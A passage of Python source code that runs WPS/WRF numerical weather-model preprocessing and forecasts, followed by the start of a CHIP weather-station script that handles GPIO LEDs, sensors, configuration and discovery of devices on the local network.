util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
self._replace_location_strings('namelist.wps')
#Before running geogrid make a picture of the domain.
logging.info('Making an image of the domains with plotgrids.ncl')
util.link_to(self.directory_WPS_input+'/util/plotgrids_new.ncl', directory_WPS_run+'/plotgrids_new.ncl')
util.replace_string_in_file('plotgrids_new.ncl', 'x11', 'pdf')
process = subprocess.Popen(['ncl', directory_WPS_run+'/plotgrids_new.ncl'])
process.wait()
#Log information to DeepThunder log-file
logging.info('WPS: run geogrid.exe')
#Run geogrid.exe
process = subprocess.Popen([directory_WPS_run+'/geogrid.exe'])
process.wait()
if self.inputDataSets.get('ECMWF') is not None:
os.remove(directory_WPS_run+'/metgrid/METGRID.TBL')
shutil.copy(self.directory_WPS_input+'/metgrid/METGRID.TBL.ARW', directory_WPS_run+'/metgrid/METGRID.TBL')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=TT\n mandatory=yes # MUST HAVE THIS FIELD', 'name=TT\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=UU\n mandatory=yes # MUST HAVE THIS FIELD', 'name=UU\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=VV\n mandatory=yes # MUST HAVE THIS FIELD', 'name=VV\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
#Log information to DeepThunder log-file
logging.info('WPS: run metgrid.exe')
#For each input dataset label
fg_name = []
constant = False
for ids, idso in dsUngrib.iteritems():
if idso.ungrib_prefix is not None:
if idso.ungrib_prefix not in fg_name and not idso.is_sst:
if idso.type in self.initialConditions or idso.type in self.boundaryConditions:
fg_name.append(idso.ungrib_prefix)
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type))
else:
logging.info('WPS: run metgrid.exe chosen not to run metgrid with '+ str(idso.type))
elif idso.is_sst and not constant and not self.is_analysis:
constant_idso = idso
#make sure the date is the same as the date used for ungrib.
constant_idso_date = constant_idso.date
try:
constant_idso_date = constant_idso.get_sst_date()
except:
logging.error('ERROR: malformed InputDataSet '+ str(idso.type))
constant = True
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type) + ' as a constant')
util.replace_string_in_file('namelist.wps', '&metgrid\n', '&metgrid\n constants_name = \''+constant_idso.ungrib_prefix+':'+str(constant_idso_date.year)+'-'+str(constant_idso_date.month).zfill(2)+'-'+str(constant_idso_date.day).zfill(2)+'_'+str(constant_idso_date.hour).zfill(2)+'\'\n') # constants_name = './SST:2015-03-26_00'
elif idso.is_sst and self.is_analysis and idso.ungrib_prefix not in fg_name:
#ungrib the SST.
fg_name.append(idso.ungrib_prefix)
self.sstintervalseconds = idso.intervalseconds
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type) + ' as a SST')
#ERAI - add pressure files
if self.inputDataSets.get('ERAI') is not None:
fg_name.append('PRES') #'ERAI','PRES'. That is TWO strings is all we need.
logging.debug('fg_name is '+str(fg_name))
util.replace_string_in_file('namelist.wps', ' fg_name = \'FILE\',', ' fg_name = \''+'\', \''.join(fg_name)+'\',')
#Run metgrid.exe
logging.info('_run_WPS: metgrid.exe called...')
process = subprocess.Popen([directory_WPS_run+'/metgrid.exe'])
process.wait()
def _ungrib(self, dataType, directory_WPS_run, ungribPrefix, datetimeEndUTC):
"""
Prepares the namelist.wps file for ungrib.exe and then runs ungrib.exe
"""
logging.info('_ungrib: ungrib called for '+ str(ungribPrefix)+' dataType is '+str(dataType))
os.chdir(directory_WPS_run)
#If the namelist already exists in destination remove it
if os.path.isfile(directory_WPS_run+'/namelist.wps'):
os.remove(directory_WPS_run+'/namelist.wps')
#Copy over a fresh namelist templet
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#ungrib with an SST is interesting because the interval time needs to match that of the other datasets. I.e. 6 hours.
#namelist.wps stores DT_INTERVAL_SECONDS which should already be set.
if dataType.startswith('SST') and not self.is_analysis:
logging.debug('_ungrib: using sstdate ' + str(self.datetimeSST))
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeSST.year)+'-'+str(self.datetimeSST.month).zfill(2)+'-'+str(self.datetimeSST.day).zfill(2)+'_'+str(self.datetimeSST.hour).zfill(2)+':00:00')
else:
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', ' prefix = \'DT_UNGRIB_PREFIX_DT\'', ' prefix = \''+ungribPrefix+'\'')
logging.info('_ungrib: ungrib replacing prefix with ' + str(ungribPrefix))
self._replace_location_strings('namelist.wps')
#Link the corresponding Variable table
logging.debug('_ungrib: link in Vtable assigning Vtable.dataType for '+str(dataType)+' to Vtable.'+str(ungribPrefix))
#If Vtable already exists remove it. link_to does not overwrite.
if os.path.isfile('Vtable'):
os.remove('Vtable')
util.link_to('ungrib/Variable_Tables/Vtable.'+str(ungribPrefix), 'Vtable')
#Run linking script
listOfFileNames = self._get_list_of_inputdatasets(dataType)
logging.debug('_ungrib: list of files to link based on dataType '+str(dataType)+' is '+str(listOfFileNames))
listOfFileNames = list(set(listOfFileNames)) # ERAI - Unique grib filenames only.
logging.info('_ungrib: running link_grib.csh')
#NOTE we do not sort filenames for erai : UA first, SFC next.
logging.info('Run link_grib.csh for '.join(listOfFileNames))
process = subprocess.Popen(['csh', 'link_grib.csh']+listOfFileNames)
process.wait()
#Log information to DeepThunder log-file
logging.info('_ungrib: run ungrib.exe for '+dataType)
#Setup a log file for ungrib.exe
ungrib_log = open(str(directory_WPS_run)+'/IBM-CFW-ungrib.log', 'a')
#Run ungrib.exe
process = subprocess.Popen([directory_WPS_run+'/ungrib.exe'], stdout=ungrib_log, stderr=ungrib_log)
process.wait()
def _get_list_of_inputdatasets(self, dataType):
"""
Creates a list of all input data set file paths and names
"""
listOfFileNames = []
for idso in self.inputfiles:
if idso.type == dataType:
if dataType == 'ERAI':
listOfFileNames.append(idso.name_prepared.strip()) # We already have absolute paths. Strip trailing spaces now.
else:
listOfFileNames.append(idso.path+'/'+idso.name_prepared) # Prefix data dir path to filenames (other than ERAI).
return listOfFileNames
def _run_Real(self, directory_Real_run, directory_WPS_run, ids, datetimeEndUTC):
"""
Prepares and executes real.exe.
ids = boundary conditions. One dataset only is accepted. This is only used to get
values for metgrid_levels and metgrid_soil_levels.
"""
logging.info('_run_Real. real called : '+ str(directory_Real_run) +' : '+ str(directory_WPS_run))
#Create the run directory for real.exe
os.makedirs(directory_Real_run)
shutil.copy(self.directory_IBM_input+'/namelist.input', directory_Real_run+'/namelist.input')
util.link_to(self.directory_WRF_input+'/real.exe', directory_Real_run+'/real.exe')
util.link_to(self.directory_WRF_input+'/wrf.exe', directory_Real_run+'/wrf.exe')
util.link_to(self.directory_WRF_input+'/aerosol.formatted', directory_Real_run+'/aerosol.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_lat.formatted', directory_Real_run+'/aerosol_lat.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_lon.formatted', directory_Real_run+'/aerosol_lon.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_plev.formatted', directory_Real_run+'/aerosol_plev.formatted')
util.link_to(self.directory_WRF_input+'/CAM_ABS_DATA', directory_Real_run+'/CAM_ABS_DATA')
util.link_to(self.directory_WRF_input+'/CAM_AEROPT_DATA', directory_Real_run+'/CAM_AEROPT_DATA')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.A1B', directory_Real_run+'/CAMtr_volume_mixing_ratio.A1B')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.A2', directory_Real_run+'/CAMtr_volume_mixing_ratio.A2')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP4.5', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP4.5')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP6', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP6')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP8.5', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP8.5')
util.link_to(self.directory_WRF_input+'/CLM_ALB_ICE_DFS_DATA', directory_Real_run+'/CLM_ALB_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ALB_ICE_DRC_DATA', directory_Real_run+'/CLM_ALB_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ASM_ICE_DFS_DATA', directory_Real_run+'/CLM_ASM_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ASM_ICE_DRC_DATA', directory_Real_run+'/CLM_ASM_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_DRDSDT0_DATA', directory_Real_run+'/CLM_DRDSDT0_DATA')
util.link_to(self.directory_WRF_input+'/CLM_EXT_ICE_DFS_DATA', directory_Real_run+'/CLM_EXT_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_EXT_ICE_DRC_DATA', directory_Real_run+'/CLM_EXT_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_KAPPA_DATA', directory_Real_run+'/CLM_KAPPA_DATA')
util.link_to(self.directory_WRF_input+'/CLM_TAU_DATA', directory_Real_run+'/CLM_TAU_DATA')
util.link_to(self.directory_WRF_input+'/co2_trans', directory_Real_run+'/co2_trans')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA', directory_Real_run+'/ETAMPNEW_DATA')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA_DBL', directory_Real_run+'/ETAMPNEW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA.expanded_rain', directory_Real_run+'/ETAMPNEW_DATA.expanded_rain')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA.expanded_rain_DBL', directory_Real_run+'/ETAMPNEW_DATA.expanded_rain_DBL')
util.link_to(self.directory_WRF_input+'/GENPARM.TBL', directory_Real_run+'/GENPARM.TBL')
util.link_to(self.directory_WRF_input+'/grib2map.tbl', directory_Real_run+'/grib2map.tbl')
util.link_to(self.directory_WRF_input+'/gribmap.txt', directory_Real_run+'/gribmap.txt')
util.link_to(self.directory_WRF_input+'/LANDUSE.TBL', directory_Real_run+'/LANDUSE.TBL')
util.link_to(self.directory_WRF_input+'/MPTABLE.TBL', directory_Real_run+'/MPTABLE.TBL')
util.link_to(self.directory_WRF_input+'/ndown.exe', directory_Real_run+'/ndown.exe')
#The WRF build script has nup.exe commented out with the phrase "#TEMPORARILY REMOVED" with 3.8.1
util.link_to(self.directory_WRF_input+'/nup.exe', directory_Real_run+'/nup.exe')
util.link_to(self.directory_WRF_input+'/ozone.formatted', directory_Real_run+'/ozone.formatted')
util.link_to(self.directory_WRF_input+'/ozone_lat.formatted', directory_Real_run+'/ozone_lat.formatted')
util.link_to(self.directory_WRF_input+'/ozone_plev.formatted', directory_Real_run+'/ozone_plev.formatted')
util.link_to(self.directory_WRF_input+'/RRTM_DATA', directory_Real_run+'/RRTM_DATA')
util.link_to(self.directory_WRF_input+'/RRTM_DATA_DBL', directory_Real_run+'/RRTM_DATA_DB')
util.link_to(self.directory_WRF_input+'/RRTMG_LW_DATA', directory_Real_run+'/RRTMG_LW_DATA')
util.link_to(self.directory_WRF_input+'/RRTMG_LW_DATA_DBL', directory_Real_run+'/RRTMG_LW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/RRTMG_SW_DATA', directory_Real_run+'/RRTMG_SW_DATA')
util.link_to(self.directory_WRF_input+'/RRTMG_SW_DATA_DBL', directory_Real_run+'/RRTMG_SW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/SOILPARM.TBL', directory_Real_run+'/SOILPARM.TBL')
util.link_to(self.directory_WRF_input+'/tc.exe', directory_Real_run+'/tc.exe')
util.link_to(self.directory_WRF_input+'/tr49t67', directory_Real_run+'/tr49t67')
util.link_to(self.directory_WRF_input+'/tr49t85', directory_Real_run+'/tr49t85')
util.link_to(self.directory_WRF_input+'/tr67t85', directory_Real_run+'/tr67t85')
util.link_to(self.directory_WRF_input+'/URBPARM.TBL', directory_Real_run+'/URBPARM.TBL')
util.link_to(self.directory_WRF_input+'/URBPARM_UZE.TBL', directory_Real_run+'/URBPARM_UZE.TBL')
util.link_to(self.directory_WRF_input+'/VEGPARM.TBL', directory_Real_run+'/VEGPARM.TBL')
os.chdir(directory_Real_run)
#The name of the first found metgrid file.
firstMetgridFile = None
#Create links to the met_em*-files
for file_name in os.listdir(directory_WPS_run):
if 'met_em.' in file_name:
util.link_to(directory_WPS_run+'/'+file_name, directory_Real_run+'/'+file_name)
#Record the name of the first found metgrid file.
if firstMetgridFile is None:
firstMetgridFile = directory_WPS_run+'/'+file_name
#Replace place-holders in input file namelist.input
util.replace_string_in_file('namelist.input', 'DT_RUN_DAYS_DT', '00')
#For REAL. run hours = max (forecastlength, interval_seconds)
if self.forecastLength < self.runlength_wps: # Based on grib input file frequency
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.runlength_wps).zfill(2))
else:
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.forecastLength-self.runshort).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_RUN_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_RUN_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_START_YEAR_DT', str(self.datetimeStartUTC.year))
util.replace_string_in_file('namelist.input', 'DT_START_MONTH_DT', str(self.datetimeStartUTC.month).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_DAY_DT', str(self.datetimeStartUTC.day).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_HOUR_DT', str(self.datetimeStartUTC.hour).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_START_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_END_YEAR_DT', str(datetimeEndUTC.year))
util.replace_string_in_file('namelist.input', 'DT_END_MONTH_DT', str(datetimeEndUTC.month).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_DAY_DT', str(datetimeEndUTC.day).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_HOUR_DT', str(datetimeEndUTC.hour).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_END_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_MAX_DOM_DT', str(max(self.domains)))
util.replace_string_in_file('namelist.input', 'DT_INTERVAL_SECONDS', str(self.WPSintervalseconds))
for dom in range(len(self.domain_dims_dx)):
util.replace_string_in_file('namelist.input', 'DT_DX_'+str(dom+1)+'_DT', str(self.domain_dims_dx[dom]))
util.replace_string_in_file('namelist.input', 'DT_DY_'+str(dom+1)+'_DT', str(self.domain_dims_dy[dom]))
#history_interval
util.replace_string_in_file('namelist.input', 'DT_HIST_'+str(dom+1)+'_DT', str(self.domain_history_interval[dom]))
for dom in range(len(self.domain_dims_dx), self.MAXINSTRUMENTEDDOMAINS+1):
util.replace_string_in_file('namelist.input', 'DT_DX_'+str(dom+1)+'_DT', str(1))
util.replace_string_in_file('namelist.input', 'DT_DY_'+str(dom+1)+'_DT', str(1))
#history_interval
util.replace_string_in_file('namelist.input', 'DT_HIST_'+str(dom+1)+'_DT', str(self.DEFAULT_HIST_INT))
util.replace_string_in_file('namelist.input', 'DT_PARENT_GRID_RATIO_DT', str(self.parent_grid_ratio))
#Setting default metgrid levels based on those from GFS. Will overwrite.
DT_NUM_METGRID_LEVELS_DT = '27'
DT_NUM_METGRID_SOIL_LEVELS_DT = '4'
#If we have found at least one metgrid file then:
if firstMetgridFile is not None:
#Set DT_NUM_METGRID_LEVELS_DT and DT_NUM_METGRID_SOIL_LEVELS_DT based on those found in the metgrid file.
DT_NUM_METGRID_LEVELS_DT = str(self._get_num_metgrid_levels(firstMetgridFile))
DT_NUM_METGRID_SOIL_LEVELS_DT = str(self._get_num_metgrid_soil_levels(firstMetgridFile))
logging.debug('_run_Real setting metgrid levels and soil levels to '+ str(DT_NUM_METGRID_LEVELS_DT)+' '+ str(DT_NUM_METGRID_SOIL_LEVELS_DT))
else:
logging.error('_run_Real NO metgrid files found. This will be fatal')
#Replace place-holders in input file namelist.input for the number of levels
util.replace_string_in_file('namelist.input', 'DT_NUM_METGRID_LEVELS_DT', DT_NUM_METGRID_LEVELS_DT)
util.replace_string_in_file('namelist.input', 'DT_NUM_METGRID_SOIL_LEVELS_DT', DT_NUM_METGRID_SOIL_LEVELS_DT)
util.replace_string_in_file('namelist.input', 'DT_TIME_STEP_DT', str(self.timeStepForecast))
util.replace_string_in_file('namelist.input', 'DT_VERT_COUNT_DT', str(self.num_vertical_levels))
#PHYSICS options start
util.replace_string_in_file('namelist.input', 'DT_MPPH', str(self.phys_mp_val))
util.replace_string_in_file('namelist.input', 'DT_RALWPH', str(self.phys_ralw_val))
util.replace_string_in_file('namelist.input', 'DT_RASWPH', str(self.phys_rasw_val))
util.replace_string_in_file('namelist.input', 'DT_SFC', str(self.phys_sfcc_val))
util.replace_string_in_file('namelist.input', 'DT_SUR', str(self.phys_sfc_val))
util.replace_string_in_file('namelist.input', 'DT_PBLPH', str(self.phys_pbl_val))
for i in self.domains:
custr = 'DT_CUPH' +str(i)
util.replace_string_in_file('namelist.input', custr, str(self.phys_cu_val[i-1]))
for i in self.idomains:
if i > max(self.domains):
custr = 'DT_CUPH' +str(i)
util.replace_string_in_file('namelist.input', custr, str(0))
util.replace_string_in_file('namelist.input', 'DT_URB', str(self.phys_urb_val))
#PHYSICS options end
self._replace_location_strings('namelist.input')
#Disable or enable auxhist2 and auxhist7
if self.auxhist7:
#Enable in hours
util.replace_string_in_file('namelist.input', 'DT_AUX7', str(1))
else:
#Set to zero to disable.
util.replace_string_in_file('namelist.input', 'DT_AUX7', str(0))
if self.auxhist2:
#Enable (in minutes)
util.replace_string_in_file('namelist.input', 'DT_AUX2', str(60))
else:
#Disable
util.replace_string_in_file('namelist.input', 'DT_AUX2', str(0))
#Disable or enable feedback
if self.feedback:
#If feedback is on set to 1
util.replace_string_in_file('namelist.input', 'DT_FEEDBACK', str(1))
else:
#Otherwise set to 0
util.replace_string_in_file('namelist.input', 'DT_FEEDBACK', str(0))
#Disable or enable adaptive time steps
if self.adaptivets:
#If feedback is on set to 1
util.replace_string_in_file('namelist.input', 'DT_ADTS', '.true.')
else:
#Otherwise set to 0
util.replace_string_in_file('namelist.input', 'DT_ADTS', '.false.')
#Setup SST_UPDATE
#Two flags need changing auxinput4_interval to the minutes between updates and sst_update to 1.
#For SST Updates to work aux input 4 files io_form_auxinput4 and auxinput4_inname must be set.
DT_AUX4_INT_DT = (self.sstintervalseconds/60)
#If the reanalysis flag is on turn SST updates on.
if self.is_analysis:
DT_SST_UPDATE_DT = 1
else:
DT_SST_UPDATE_DT = 0
util.replace_string_in_file('namelist.input', 'DT_AUX4_INT_DT', str(DT_AUX4_INT_DT))
util.replace_string_in_file('namelist.input', 'DT_SST_UPDATE_DT', str(DT_SST_UPDATE_DT))
#No obsnudging in Stevedore (this will change in the future)
DT_AUX11 = 0
DT_AUXEH11 = 0
util.replace_string_in_file('namelist.input', 'DT_AUX11', str(DT_AUX11))
util.replace_string_in_file('namelist.input', 'DT_AUXEH11', str(DT_AUXEH11))
# Run real.exe with -np processes
try:
process = subprocess.Popen(['mpirun', '-np', str(self.numberCores), './real.exe'])
process.wait()
except OSError as os_err:
logging.error('real.exe log-file failed to run. Please check that mpirun is in your path.')
logging.error(' error is '+ str(os_err.strerror))
#Log information to log-file
logging.info('real.exe log-file')
#Copy real.exe log into general stevedore log-file
reallog = open(directory_Real_run+'/rsl.error.0000').read()
logging.info(reallog)
#run_hours for WRF set to forecast length here
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.forecastLength))
def run_WRF(self):
"""
Runs WRF. After copying the required files it runs real.exe and then starts wrf.exe.
"""
#Log information to DeepThunder log-file
logging.info('Run WRF ...')
if self.norunwrf:
#No need to create directories not running wrf.
logging.info('No need to create directories for wrf output, we are not running wrf')
else:
# Create directories for wrf output
if os.path.exists(self.directory_wrf_run):
logging.info('run_WRF: Moving old wrf run to wrf_old ...')
if os.path.exists(self.directory_wrf_run+'_old'):
logging.info('run_WRF: removing old wrf_old directory ...')
shutil.rmtree(self.directory_wrf_run+'_old')
shutil.move(self.directory_wrf_run, self.directory_wrf_run+'_old')
if not self.norunwrf:
shutil.copytree(self.directory_PreProcessing_run+'/Real_boundary', self.directory_wrf_run)
if os.path.exists(self.directory_PreProcessing_run+'/Real_initial'):
for domain in self.domains:
os.remove(self.directory_wrf_run+'/wrfinput_d0'+str(domain))
shutil.copyfile(self.directory_PreProcessing_run+'/Real_initial/wrfinput_d0'+str(domain), self.directory_wrf_run+'/wrfinput_d0'+str(domain))
#Hook in Tslist if this file exists in then read copy it to the run directory.
if self.tsfile is not None:
logging.info('run_WRF: a time series file (ts_file) is being read in from '+ str(self.tsfile))
if os.path.exists(self.tsfile):
shutil.copyfile(self.tsfile, self.directory_wrf_run+'/tslist')
#Run WRF
self._execute_WRF(self.numberCores, self.directory_wrf_run, self.norunwrf)
#Log end-of-run
logging.info('run_WRF: wrf.exe finished!')
@staticmethod
def _execute_WRF(number_cores, directory_wrf_run, norunwrf):
"""
Starting wrf.exe
"""
if norunwrf:
logging.info('_execute_WRF: run WRF.exe has been skipped by the user. ')
else:
# record start of execution of wrf.exe
logging.info('_execute_WRF: run WRF.exe')
os.chdir(directory_wrf_run)
process = subprocess.Popen(['mpirun', '-np', str(number_cores), './wrf.exe'])
process.wait()
@staticmethod
def _download_geog_data(directory_root_geog, directory_root_input):
"""
Download static geog data if the user does not already have it.
"""
logging.warning('_download_geog_data no geog data exists. This will be downloaded for you and extracted to '+directory_root_geog)
os.makedirs(directory_root_geog)
process = subprocess.Popen(['/bin/bash', '/opt/deepthunder/stevedore/scripts/download_geog_data.sh'])
process.wait()
os.chdir(directory_root_input)
@staticmethod
def _get_num_metgrid_levels(filename):
"""
From a netcdf file output from metgrid obtain the value of num_metgrid_levels
"""
#ncdump -h met_em.d01.2017-04-12_00:00:00.nc | grep 'num_metgrid_levels =' | cut -d " " -f3
#log entry:
logging.debug("In _get_num_metgrid_levels")
#Load the dataset from the selected filename.
froot = Dataset(filename, "r", format="NETCDF4")
#Get the dimension 'num_metgrid_levels'
levels = froot.dimensions["num_metgrid_levels"]
#Return the size of num_metgrid_levels as an int.
return int(len(levels))
@staticmethod
def _get_num_metgrid_soil_levels(filename):
"""
From a netcdf file output from metgrid obtain the value of num_metgrid_soil_levels
"""
#log entry:
logging.debug("In _get_num_metgrid_soil_levels")
#Load the dataset from the selected filename.
rootgrp = Dataset(filename, "r", format="NETCDF4")
#get the attributes
soil_levels = getattr(rootgrp, 'NUM_METGRID_SOIL_LEVELS')
#Return the number of soil levels as an int.
return int(soil_levels)
|
weather.py
|
# -*- coding: utf-8 -*-
'''
See Installation directory for installation dependencies
https://docs.getchip.com/chip.html#how-you-see-gpio
https://bbs.nextthing.co/t/reading-dht11-dht22-am2302-sensors/2383/78
'''
from bottle import Bottle, route, run, static_file, response
from threading import Thread
import subprocess
import os
import time
import rrdtool
import datetime
import time
import ConfigParser
import uuid
import netifaces
import netaddr
import socket
import urllib2
import multiprocessing
import logging
logger = logging.getLogger(__name__)
#from gevent import monkey, sleep
#monkey.patch_all()
def check_device(ipnumber):
try:
req = urllib2.Request('http://' + ipnumber + ':8080/api/info')
response = urllib2.urlopen(req)
return ipnumber
except Exception, err:
pass
return None
class CHIPWeatherStationUtils():
@staticmethod
def to_fahrenheit(value):
return float(value) * 9.0 / 5.0 + 32.0
@staticmethod
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
@staticmethod
def get_ip_number():
for interface in netifaces.interfaces():
if interface in ['lo','sit']:
continue
networkdata = netifaces.ifaddresses(interface)
if netifaces.AF_INET in networkdata:
for ip in networkdata[netifaces.AF_INET]:
if 'addr' in ip and 'netmask' in ip and not ip['addr'].startswith('169'):
return ip['addr']
return False
@staticmethod
def get_network_ip_numbers():
data = []
for interface in netifaces.interfaces():
if interface in ['lo','sit']:
continue
networkdata = netifaces.ifaddresses(interface)
if netifaces.AF_INET in networkdata:
for ip in networkdata[netifaces.AF_INET]:
if 'addr' in ip and 'netmask' in ip and not ip['addr'].startswith('169'):
try:
iprange = netaddr.IPNetwork(ip['addr'] + '/' + ip['netmask'])
for ipnumber in iprange.iter_hosts():
data.append(str(ipnumber))
except Exception, err:
#print err
pass
return data
class CHIPWeatherStationConfig():
def __init__(self):
self.__defaults_file = 'defaults.cfg'
self.__config_file = 'settings.cfg'
self.__config = ConfigParser.SafeConfigParser()
# Read defaults config file
self.__config.readfp(open(self.__defaults_file))
# Read new version number
version = self.__get_config('system')['version']
# Read custom config file
self.__config.read(self.__config_file)
# Update version number
self.__config.set('system', 'version', str(version))
def __save_config(self):
'''Write terrariumPI config to settings.cfg file'''
with open(self.__config_file, 'wb') as configfile:
self.__config.write(configfile)
return True
def __get_config(self,section):
'''Get terrariumPI config based on section. Return empty dict when not exists
Keyword arguments:
section -- section to read from the config'''
config = {}
if not self.__config.has_section(section):
return config
for config_part in self.__config.items(section):
config[config_part[0]] = config_part[1]
return config
def get_version(self):
return self.__get_config('system')['version']
def get_uuid(self):
sensorid = None
if 'sensorid' in self.__get_config('system'):
sensorid = self.__get_config('system')['sensorid']
else:
sensorid = str(uuid.uuid4())
self.__config.set('system', 'sensorid', str(sensorid))
self.__save_config()
return sensorid
def get_name(self):
return self.__get_config('system')['name']
def get_led_pin(self):
return int(self.__get_config('system')['gpio_led'])
def get_host_name(self):
return self.__get_config('system')['hostname']
def get_port_number(self):
return self.__get_config('system')['portnumber']
class CHIPWeatherStationLEDIndicator():
def __init__(self, pin):
self.__active = False
self.__base_pin = None
self.__scan_pin_base()
if self.__base_pin is not None:
self.pin = self.__base_pin + pin
self.__init_gpio()
self.off()
else:
logger.error('GPIO is not available!')
print 'ERROR, no GPIO available!'
def __scan_pin_base(self):
self.__base_pin = subprocess.Popen('grep -l pcf8574a /sys/class/gpio/*/*label | grep -o "[0-9]*"',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip()
if CHIPWeatherStationUtils.is_number(self.__base_pin):
self.__base_pin = int(self.__base_pin)
def __init_gpio(self):
# Open GPIO pin
if os.path.isfile('/sys/class/gpio/gpio' + str(self.pin) + '/value'):
self.close()
subprocess.Popen('echo ' + str(self.pin) + ' > /sys/class/gpio/export',shell=True,stdout=subprocess.PIPE)
# Set direction to OUT going
subprocess.Popen('echo out > /sys/class/gpio/gpio' + str(self.pin) + '/direction',shell=True,stdout=subprocess.PIPE)
# Force output closed by default
subprocess.Popen('echo 1 > /sys/class/gpio/gpio' + str(self.pin) + '/active_low',shell=True,stdout=subprocess.PIPE)
self.__active = True
def on(self):
if self.__active:
subprocess.Popen('echo 1 > /sys/class/gpio/gpio' + str(self.pin) + '/value',shell=True,stdout=subprocess.PIPE)
def off(self):
if self.__active:
subprocess.Popen('echo 0 > /sys/class/gpio/gpio' + str(self.pin) + '/value',shell=True,stdout=subprocess.PIPE)
def close(self):
subprocess.Popen('echo ' + str(self.pin) + ' > /sys/class/gpio/unexport',shell=True,stdout=subprocess.PIPE)
class CHIPWeatherStationCPUSensor():
def __init__(self):
self.__cpu_temp = 0.0
self.__last_update = 0.0
self.__update_time_out = 60.0
self.__update()
def __update(self):
now = time.time()
if now - self.__last_update > self.__update_time_out:
cpu_temp = subprocess.Popen('/usr/sbin/axp209 --temperature',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip()
if 'oC' in cpu_temp:
self.__cpu_temp = float(cpu_temp.replace('oC','').strip())
self.__last_update = now
def get_temperature(self):
self.__update()
return self.__cpu_temp
class CHIPWeatherStationSensor():
def __init__(self):
self.__last_temp_update = 0.0
self.__last_hum_update = 0.0
self.__update_time_out = 60.0
self.__temperature = 0.0
self.__humidity = 0.0
self.__sensor_path = None
self.__scan_sensor()
self.__update()
def __scan_sensor(self):
self.__sensor_path = subprocess.Popen('grep -l humidity_sensor /sys/bus/iio/devices/iio:device*/name',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip().replace('/name','')
if self.__sensor_path == '':
self.__sensor_path = None
def __update(self):
now = time.time()
if self.__sensor_path is None:
return False
if now - self.__last_hum_update > self.__update_time_out:
for attempt in xrange(0,3):
try:
if os.path.isfile(self.__sensor_path + '/in_humidityrelative_input'):
with open(self.__sensor_path + '/in_humidityrelative_input') as sensor:
